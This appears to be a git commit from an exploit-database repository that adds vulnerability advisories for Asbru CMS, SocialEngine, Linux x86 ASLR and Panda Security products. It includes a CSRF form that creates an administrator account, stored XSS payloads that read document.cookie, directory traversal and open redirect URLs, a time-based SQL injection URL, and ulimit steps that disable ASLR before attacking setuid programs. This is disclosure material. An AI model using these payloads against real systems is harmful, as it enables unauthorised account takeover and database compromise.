DB: 2016-04-07
5 new exploits Asbru Web Content Management System 9.2.7 - Multiple Vulnerabilities SocialEngine 4.8.9 - SQL Injection Linux x86 - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited Panda Security URL Filtering < 4.3.1.9 - Privilege Escalation Panda Endpoint Administration Agent < 7.50.00 - Privilege Escalation
This commit is contained in:
parent
60fd0ef490
commit
48af7fb829
6 changed files with 726 additions and 0 deletions
|
@ -35888,3 +35888,8 @@ id,file,description,date,author,platform,type,port
|
|||
39663,platforms/windows/dos/39663.html,"Internet Explorer - MSHTML!CSVGHelpers::SetAttributeStringAndPointer Use-After-Free (MS16-023)",2016-04-05,"Google Security Research",windows,dos,0
|
||||
39664,platforms/jsp/webapps/39664.txt,"ManageEngine Password Manager Pro 8102 to 8302 - Multiple Vulnerabilities",2016-04-05,S3ba,jsp,webapps,7272
|
||||
39666,platforms/windows/local/39666.txt,"Windows Kernel Win32k.sys Privilege Escalation Exploit (MS14-058)",2016-04-05,"MWR InfoSecurity",windows,local,0
|
||||
39667,platforms/jsp/webapps/39667.txt,"Asbru Web Content Management System 9.2.7 - Multiple Vulnerabilities",2016-04-06,LiquidWorm,jsp,webapps,80
|
||||
39668,platforms/php/webapps/39668.txt,"SocialEngine 4.8.9 - SQL Injection",2016-04-06,"High-Tech Bridge SA",php,webapps,80
|
||||
39669,platforms/linux/dos/39669.txt,"Linux x86 - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco and Ismael Ripoll",linux,dos,0
|
||||
39670,platforms/windows/local/39670.txt,"Panda Security URL Filtering < 4.3.1.9 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0
|
||||
39671,platforms/windows/local/39671.txt,"Panda Endpoint Administration Agent < 7.50.00 - Privilege Escalation",2016-04-06,"Kyriakos Economou",windows,local,0
|
||||
|
|
Can't render this file because it is too large.
|
445
platforms/jsp/webapps/39667.txt
Executable file
445
platforms/jsp/webapps/39667.txt
Executable file
|
@ -0,0 +1,445 @@
|
|||
|
||||
Asbru Web Content Management System v9.2.7 Multiple Vulnerabilities
|
||||
|
||||
|
||||
Vendor: Asbru Ltd.
|
||||
Product web page: http://www.asbrusoft.com
|
||||
Affected version: 9.2.7
|
||||
|
||||
Summary: Ready to use, full-featured, database-driven web content management
|
||||
system (CMS) with integrated community, databases, e-commerce and statistics
|
||||
modules for creating, publishing and managing rich and user-friendly Internet,
|
||||
Extranet and Intranet websites.
|
||||
|
||||
Desc: Asbru WCM suffers from multiple vulnerabilities including Cross-Site Request
|
||||
Forgery, Stored Cross-Site Scripting, Open Redirect and Information Disclosure.
|
||||
|
||||
Tested on : Apache Tomcat/5.5.23
|
||||
Apache/2.2.3 (CentOS)
|
||||
|
||||
|
||||
Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
|
||||
@zeroscience
|
||||
|
||||
|
||||
Advisory ID: ZSL-2016-5314
|
||||
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5314.php
|
||||
|
||||
|
||||
09.03.2016
|
||||
|
||||
--
|
||||
|
||||
|
||||
#1
|
||||
Directory Traversal:
|
||||
--------------------
|
||||
|
||||
http://10.0.0.7/../../../../../WEB-INF/web.xml
|
||||
|
||||
|
||||
#2
|
||||
Open Redirect:
|
||||
--------------
|
||||
|
||||
http://10.0.0.7/login_post.jsp?url=http://www.zeroscience.mk
|
||||
|
||||
|
||||
#3
|
||||
Cross-Site Request Forgery (Add 'administrator' With Full Privileges):
|
||||
----------------------------------------------------------------------
|
||||
|
||||
<html>
|
||||
<body>
|
||||
<form action="http://10.0.0.7/webadmin/users/create_post.jsp?id=&redirect=" method="POST">
|
||||
<input type="hidden" name="userinfo" value=" <TEST></TEST> " />
|
||||
<input type="hidden" name="title" value="Mr" />
|
||||
<input type="hidden" name="name" value="Chekmidash" />
|
||||
<input type="hidden" name="organisation" value="ZSL" />
|
||||
<input type="hidden" name="email" value="test@testingus.io" />
|
||||
<input type="hidden" name="gender" value="1" />
|
||||
<input type="hidden" name="birthdate" value="1984-01-01" />
|
||||
<input type="hidden" name="birthday" value="01" />
|
||||
<input type="hidden" name="birthmonth" value="01" />
|
||||
<input type="hidden" name="birthyear" value="1984" />
|
||||
<input type="hidden" name="notes" value="CSRFNote" />
|
||||
<input type="hidden" name="userinfo1" value="" />
|
||||
<input type="hidden" name="userinfoname" value="" />
|
||||
<input type="hidden" name="username" value="hackedusername" />
|
||||
<input type="hidden" name="password" value="password123" />
|
||||
<input type="hidden" name="userclass" value="administrator" />
|
||||
<input type="hidden" name="usergroup" value="" />
|
||||
<input type="hidden" name="usertype" value="" />
|
||||
<input type="hidden" name="usergroups" value="Account Managers" />
|
||||
<input type="hidden" name="usergroups" value="Company Bloggers" />
|
||||
<input type="hidden" name="usergroups" value="Customer" />
|
||||
<input type="hidden" name="usergroups" value="Event Managers" />
|
||||
<input type="hidden" name="usergroups" value="Financial Officers" />
|
||||
<input type="hidden" name="usergroups" value="Forum Moderator" />
|
||||
<input type="hidden" name="usergroups" value="Human Resources" />
|
||||
<input type="hidden" name="usergroups" value="Intranet Managers" />
|
||||
<input type="hidden" name="usergroups" value="Intranet Users" />
|
||||
<input type="hidden" name="usergroups" value="Newsletter" />
|
||||
<input type="hidden" name="usergroups" value="Press Officers" />
|
||||
<input type="hidden" name="usergroups" value="Product Managers" />
|
||||
<input type="hidden" name="usergroups" value="Registered Users" />
|
||||
<input type="hidden" name="usergroups" value="Shop Managers" />
|
||||
<input type="hidden" name="usergroups" value="Subscribers" />
|
||||
<input type="hidden" name="usergroups" value="Support Ticket Administrators" />
|
||||
<input type="hidden" name="usergroups" value="Support Ticket Users" />
|
||||
<input type="hidden" name="usergroups" value="User Managers" />
|
||||
<input type="hidden" name="usergroups" value="Website Administrators" />
|
||||
<input type="hidden" name="usergroups" value="Website Developers" />
|
||||
<input type="hidden" name="users_group" value="" />
|
||||
<input type="hidden" name="users_type" value="" />
|
||||
<input type="hidden" name="creators_group" value="" />
|
||||
<input type="hidden" name="creators_type" value="" />
|
||||
<input type="hidden" name="editors_group" value="" />
|
||||
<input type="hidden" name="editors_type" value="" />
|
||||
<input type="hidden" name="publishers_group" value="" />
|
||||
<input type="hidden" name="publishers_type" value="" />
|
||||
<input type="hidden" name="administrators_group" value="" />
|
||||
<input type="hidden" name="administrators_type" value="" />
|
||||
<input type="hidden" name="scheduled_publish" value="2016-03-13 00:00" />
|
||||
<input type="hidden" name="scheduled_publish_email" value="" />
|
||||
<input type="hidden" name="scheduled_notify" value="" />
|
||||
<input type="hidden" name="scheduled_notify_email" value="" />
|
||||
<input type="hidden" name="scheduled_unpublish" value="" />
|
||||
<input type="hidden" name="scheduled_unpublish_email" value="" />
|
||||
<input type="hidden" name="invoice_name" value="Icebreaker" />
|
||||
<input type="hidden" name="invoice_organisation" value="Zero Science Lab" />
|
||||
<input type="hidden" name="invoice_address" value="nu" />
|
||||
<input type="hidden" name="invoice_postalcode" value="1300" />
|
||||
<input type="hidden" name="invoice_city" value="Neverland" />
|
||||
<input type="hidden" name="invoice_state" value="ND" />
|
||||
<input type="hidden" name="invoice_country" value="ND" />
|
||||
<input type="hidden" name="invoice_phone" value="111-222-3333" />
|
||||
<input type="hidden" name="invoice_fax" value="" />
|
||||
<input type="hidden" name="invoice_email" value="lab@zeroscience.tld" />
|
||||
<input type="hidden" name="invoice_website" value="www.zeroscience.mk" />
|
||||
<input type="hidden" name="delivery_name" value="" />
|
||||
<input type="hidden" name="delivery_organisation" value="" />
|
||||
<input type="hidden" name="delivery_address" value="" />
|
||||
<input type="hidden" name="delivery_postalcode" value="" />
|
||||
<input type="hidden" name="delivery_city" value="" />
|
||||
<input type="hidden" name="delivery_state" value="" />
|
||||
<input type="hidden" name="delivery_country" value="" />
|
||||
<input type="hidden" name="delivery_phone" value="" />
|
||||
<input type="hidden" name="delivery_fax" value="" />
|
||||
<input type="hidden" name="delivery_email" value="" />
|
||||
<input type="hidden" name="delivery_website" value="" />
|
||||
<input type="hidden" name="card_type" value="VISA" />
|
||||
<input type="hidden" name="card_number" value="4444333322221111" />
|
||||
<input type="hidden" name="card_issuedmonth" value="01" />
|
||||
<input type="hidden" name="card_issuedyear" value="2016" />
|
||||
<input type="hidden" name="card_expirymonth" value="01" />
|
||||
<input type="hidden" name="card_expiryyear" value="2100" />
|
||||
<input type="hidden" name="card_name" value="Hacker Hackerowsky" />
|
||||
<input type="hidden" name="card_cvc" value="133" />
|
||||
<input type="hidden" name="card_issue" value="" />
|
||||
<input type="hidden" name="card_postalcode" value="1300" />
|
||||
<input type="hidden" name="content_editor" value="" />
|
||||
<input type="hidden" name="hardcore_upload" value="" />
|
||||
<input type="hidden" name="hardcore_format" value="" />
|
||||
<input type="hidden" name="hardcore_width" value="" />
|
||||
<input type="hidden" name="hardcore_height" value="" />
|
||||
<input type="hidden" name="hardcore_onenter" value="" />
|
||||
<input type="hidden" name="hardcore_onctrlenter" value="" />
|
||||
<input type="hidden" name="hardcore_onshiftenter" value="" />
|
||||
<input type="hidden" name="hardcore_onaltenter" value="" />
|
||||
<input type="hidden" name="hardcore_toolbar1" value="" />
|
||||
<input type="hidden" name="hardcore_toolbar2" value="" />
|
||||
<input type="hidden" name="hardcore_toolbar3" value="" />
|
||||
<input type="hidden" name="hardcore_toolbar4" value="" />
|
||||
<input type="hidden" name="hardcore_toolbar5" value="" />
|
||||
<input type="hidden" name="hardcore_formatblock" value="" />
|
||||
<input type="hidden" name="hardcore_fontname" value="" />
|
||||
<input type="hidden" name="hardcore_fontsize" value="" />
|
||||
<input type="hidden" name="hardcore_customscript" value="" />
|
||||
<input type="hidden" name="startpage" value="" />
|
||||
<input type="hidden" name="workspace_sections" value="" />
|
||||
<input type="hidden" name="index_workspace" value="" />
|
||||
<input type="hidden" name="index_content" value="" />
|
||||
<input type="hidden" name="index_library" value="" />
|
||||
<input type="hidden" name="index_product" value="" />
|
||||
<input type="hidden" name="index_stock" value="" />
|
||||
<input type="hidden" name="index_order" value="" />
|
||||
<input type="hidden" name="index_segments" value="" />
|
||||
<input type="hidden" name="index_usertests" value="" />
|
||||
<input type="hidden" name="index_heatmaps" value="" />
|
||||
<input type="hidden" name="index_user" value="" />
|
||||
<input type="hidden" name="index_websites" value="" />
|
||||
<input type="hidden" name="menu_selection" value="" />
|
||||
<input type="hidden" name="statistics_reports" value="" />
|
||||
<input type="hidden" name="sales_reports" value="" />
|
||||
<input type="submit" value="Initiate" />
|
||||
</form>
|
||||
</body>
|
||||
</html>
|
||||
|
||||
|
||||
#4
|
||||
Stored Cross-Site Scripting:
|
||||
----------------------------
|
||||
|
||||
a)
|
||||
|
||||
|
||||
POST /webadmin/content/create_post.jsp?id=&redirect= HTTP/1.1
|
||||
Host: 10.0.0.7
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="webeditor_stylesheet"
|
||||
|
||||
/stylesheet.jsp?id=1,1&device=&useragent=&
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="restore"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="archive"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="publish"
|
||||
|
||||
Save & Publish
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="scheduled_publish"
|
||||
|
||||
2016-03-09 13:29
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="scheduled_unpublish"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="checkedout"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="revision"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="title"
|
||||
|
||||
"><script>alert(document.cookie)</script>
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="searchable"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="menuitem"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="file"; filename="test.svg"
|
||||
Content-Type: image/svg+xml
|
||||
|
||||
testsvgxxefailed
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="file_data"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="server_filename"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="contentdelivery"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="image1"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="image2"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="image3"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="metainfo"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="segmentation"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="author"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="description"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="keywords"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="metainfoname"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="segmentationname"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="segmentationvalue"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="contentpackage"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="contentclass"
|
||||
|
||||
image
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="contentgroup"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="contenttype"
|
||||
|
||||
Photos
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="version_master"
|
||||
|
||||
0
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="version"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="device"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="usersegment"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="usertest"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="users_group"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="users_type"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="users_users"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="creators_group"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="creators_type"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="creators_users"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="editors_group"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="editors_type"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="editors_users"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="publishers_group"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="publishers_type"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="publishers_users"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="developers_group"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="developers_type"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="developers_users"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="administrators_group"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="administrators_type"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="administrators_users"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="page_top"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="page_up"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="page_previous"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="page_next"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="page_first"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="page_last"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="related"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN
|
||||
Content-Disposition: form-data; name="selectrelated"
|
||||
|
||||
|
||||
------WebKitFormBoundarygqlN2AtccVFqx0YN--
|
||||
|
||||
|
||||
b)
|
||||
|
||||
POST /webadmin/fileformats/create_post.jsp HTTP/1.1
|
||||
Host: 10.0.0.7
|
||||
|
||||
filenameextension="><script>alert(document.cookie)</script>
|
||||
|
143
platforms/linux/dos/39669.txt
Executable file
143
platforms/linux/dos/39669.txt
Executable file
|
@ -0,0 +1,143 @@
|
|||
Source: http://hmarco.org/bugs/CVE-2016-3672-Unlimiting-the-stack-not-longer-disables-ASLR.html
|
||||
|
||||
CVE-2016-3672 - Unlimiting the stack not longer disables ASLR
|
||||
Authors: Hector Marco & Ismael Ripoll
|
||||
CVE: CVE-2016-3672
|
||||
Dates: April 2016
|
||||
|
||||
|
||||
Description
|
||||
|
||||
We have fixed an old and very known weakness in the Linux ASLR implementation.
|
||||
Any user able to running 32-bit applications in a x86 machine can disable the ASLR by setting the RLIMIT_STACK resource to unlimited.
|
||||
|
||||
Following are the steps to test whether your system is vulnerable or not:
|
||||
|
||||
1) Create a dummy program which shows its memory map:
|
||||
|
||||
#include <stdio.h>
|
||||
|
||||
int main(int argc, const char *argv[])
|
||||
{
|
||||
char cmd[256];
|
||||
sprintf(cmd, "cat /proc/%d/maps", getpid());
|
||||
system(cmd);
|
||||
return 0;
|
||||
}
|
||||
|
||||
2) Compile it:
|
||||
|
||||
$ gcc show_maps.c -o show_maps # In a i386 machine
|
||||
$ gcc show_maps.c -o show_maps -m32 # In a 64-bit machine
|
||||
|
||||
3) Run the application to check that ASLR is working
|
||||
|
||||
$ for i in `seq 1 10`; do ./show_maps | grep "r-xp.*libc"; done
|
||||
f75c4000-f7769000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
f75db000-f7780000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
f7557000-f76fc000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
f7595000-f773a000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
f7574000-f7719000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
f75af000-f7754000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
f7530000-f76d5000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
f7529000-f76ce000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
f75c2000-f7767000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
f75fe000-f77a3000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
|
||||
|
||||
The libc-2.19.so library is mapped at random positions, so, the ASLR is working properly.
|
||||
Now, we run the same test but setting the stack to unlimited:
|
||||
|
||||
|
||||
$ ulimit -a | grep stack
|
||||
stack size (kbytes, -s) 8192
|
||||
$ ulimit -s unlimited
|
||||
stack size (kbytes, -s) unlimited
|
||||
$ for i in `seq 1 10`; do ./show_maps | grep "r-xp.*libc"; done
|
||||
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
5559a000-5573f000 r-xp 00000000 08:01 784726 /lib32/libc-2.19.so
|
||||
|
||||
|
||||
The libc-2.19.so library is mapped at the same position in all executions: the ASLR has been disabled.
|
||||
This is a very old trick to disable ASLR, but unfortunately it was still present in current Linux systems.
|
||||
|
||||
Vulnerable packages
|
||||
|
||||
The weakness, IFAIK is present from the first version of current Linux GIT repository. The first version on this resposiroty is Linux-2.6.12-rc2 dated on April 2005.
|
||||
|
||||
Impact
|
||||
|
||||
An attacker capable of running 32-bit system applications in a x86 machine is able to disable the ASLR of any application, including sensitive applications such as setuid and setgid. Note that it is not a exploitable vulnerability by itself but a trick to disable the ASLR. This weakness can be use by an attacker when trying to exploit some other bug. Since the i386 is still very used, the number of systems and affected users could be extremely huge.
|
||||
The wekaness
|
||||
|
||||
The issue arises because the ASLR Linux implementation does not randomize always the mmap base address when the stack size is set to unlimited. Concretely, on i386 and on X86_64 when emulating X86_32 in legacy mode, only the stack and the executable are randomized but not other mmapped files (libraries, vDSO, etc.). And depending in the Linux version, the executable is neither randomized.
|
||||
|
||||
The function to calculate the libraries position when the stack is set to unlimited is mmap_legacy_base():
|
||||
|
||||
|
||||
static unsigned long mmap_legacy_base(void)
|
||||
{
|
||||
if (mmap_is_ia32())
|
||||
return TASK_UNMAPPED_BASE;
|
||||
else
|
||||
return TASK_UNMAPPED_BASE + mmap_rnd();
|
||||
}
|
||||
|
||||
|
||||
The function doesn't add any random offset when the system is running in a native 32-bit system (i386) or a 32-bit emulated system (x86_32).
|
||||
Exploit
|
||||
|
||||
To exploit this weakness, the attacker just need to set to unlimited the stack and then execute a 32-bit application. Obviously the idea is to execute (attack) privileged applications such as setuid/setgid.
|
||||
FIX
|
||||
|
||||
We have created a patch to fix this issue:
|
||||
|
||||
|
||||
diff --git a/arch/x86/mm/mmap.c b/arch/x86/mm/mmap.c
|
||||
index 96bd1e2..389939f 100644
|
||||
--- a/arch/x86/mm/mmap.c
|
||||
+++ b/arch/x86/mm/mmap.c
|
||||
@@ -94,18 +94,6 @@ static unsigned long mmap_base(unsigned long rnd)
|
||||
}
|
||||
|
||||
/*
|
||||
- * Bottom-up (legacy) layout on X86_32 did not support randomization, X86_64
|
||||
- * does, but not when emulating X86_32
|
||||
- */
|
||||
-static unsigned long mmap_legacy_base(unsigned long rnd)
|
||||
-{
|
||||
- if (mmap_is_ia32())
|
||||
- return TASK_UNMAPPED_BASE;
|
||||
- else
|
||||
- return TASK_UNMAPPED_BASE + rnd;
|
||||
-}
|
||||
-
|
||||
-/*
|
||||
* This function, called very early during the creation of a new
|
||||
* process VM image, sets up which VM layout function to use:
|
||||
*/
|
||||
@@ -116,7 +104,7 @@ void arch_pick_mmap_layout(struct mm_struct *mm)
|
||||
if (current->flags & PF_RANDOMIZE)
|
||||
random_factor = arch_mmap_rnd();
|
||||
|
||||
- mm->mmap_legacy_base = mmap_legacy_base(random_factor);
|
||||
+ mm->mmap_legacy_base = TASK_UNMAPPED_BASE + random_factor;
|
||||
|
||||
if (mmap_is_legacy()) {
|
||||
mm->mmap_base = mm->mmap_legacy_base;
|
||||
|
||||
|
||||
The patch enables randomization for the libraries, vDSO and mmap requests on i386 and in X86_32 in legacy mode. We already sent the patch to Linux mantainers and the issue will be not problem in incomming Linux versions: Enable full randomization on i386 and X86_32
|
||||
Discussion
|
||||
|
||||
Although this vulnerability is not exploitable by itself, the truth is that the ASLR protection mechanism is useless on local attacks for i386 and x86_32 systems when the attackers are able to attack applications that they can lauch.
|
||||
|
||||
Hector Marco - http://hmarco.org
|
47
platforms/php/webapps/39668.txt
Executable file
47
platforms/php/webapps/39668.txt
Executable file
|
@ -0,0 +1,47 @@
|
|||
Advisory ID: HTB23286
|
||||
Product: SocialEngine
|
||||
Vendor: Webligo
|
||||
Vulnerable Version(s): 4.8.9 and probably prior
|
||||
Tested Version: 4.8.9
|
||||
Advisory Publication: December 21, 2015 [without technical details]
|
||||
Vendor Notification: December 21, 2015
|
||||
Public Disclosure: April 6, 2016
|
||||
Vulnerability Type: SQL Injection [CWE-89]
|
||||
Risk Level: High
|
||||
CVSSv3 Base Score: 7.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L]
|
||||
Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
Advisory Details:
|
||||
|
||||
High-Tech Bridge Security Research Lab discovered SQL-Injection vulnerability in a popular social networking software SocialEngine. The vulnerability can be exploited to gain access to potentially sensitive information in database and compromise the entire website.
|
||||
|
||||
The vulnerability exists due to insufficient filtration of input data passed via the "orderby" HTTP GET parameter to "/index.php" script. A remote unauthenticated attacker can modify present query and execute arbitrary SQL commands in application's database.
|
||||
|
||||
A simple exploit below uses time-based SQL injection technique to demonstrate existence of the vulnerability. The following HTTP request will make page render for 99 seconds, if MySQL server version is is equal "5":
|
||||
|
||||
http://[host]/blogs/?category=0&end_date=&orderby=1%20AND%20%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%28IF%28MID%28version%28%29,1,1%29%20LIKE%205,99,0%29%29%29%29MTeU%29
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
Solution:
|
||||
|
||||
Update to SocialEngine 4.8.10
|
||||
|
||||
More Information:
|
||||
http://blog.socialengine.com/2016/01/20/socialengine-php-4-8-10-is-released/
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
References:
|
||||
|
||||
[1] High-Tech Bridge Advisory HTB23286 - https://www.htbridge.com/advisory/HTB23286 - SQL Injection in SocialEngine
|
||||
[2] SocialEngine - http://www.socialengine.com/ - SocialEngine is PHP community software that helps you build your own custom social network website. Advanced social networking features include blogs, photo albums, user groups and forums, providing complete control over the layout and functionality of your social network, community, forum, or portal.
|
||||
[3] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
|
||||
[4] ImmuniWeb® - https://www.htbridge.com/immuniweb/ - web security platform by High-Tech Bridge for on-demand and continuous web application security, vulnerability management, monitoring and PCI DSS compliance.
|
||||
[5] Free SSL/TLS Server test - https://www.htbridge.com/ssl/ - check your SSL implementation for PCI DSS and NIST compliance. Supports all types of protocols.
|
||||
|
||||
-----------------------------------------------------------------------------------------------
|
||||
|
||||
Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
|
46
platforms/windows/local/39670.txt
Executable file
46
platforms/windows/local/39670.txt
Executable file
|
@ -0,0 +1,46 @@
|
|||
* CVE: CVE-2015-7378
|
||||
* Vendor: Panda Security
|
||||
* Reported by: Kyriakos Economou
|
||||
* Date of Release: 05/04/2016
|
||||
* Affected Products: Multiple
|
||||
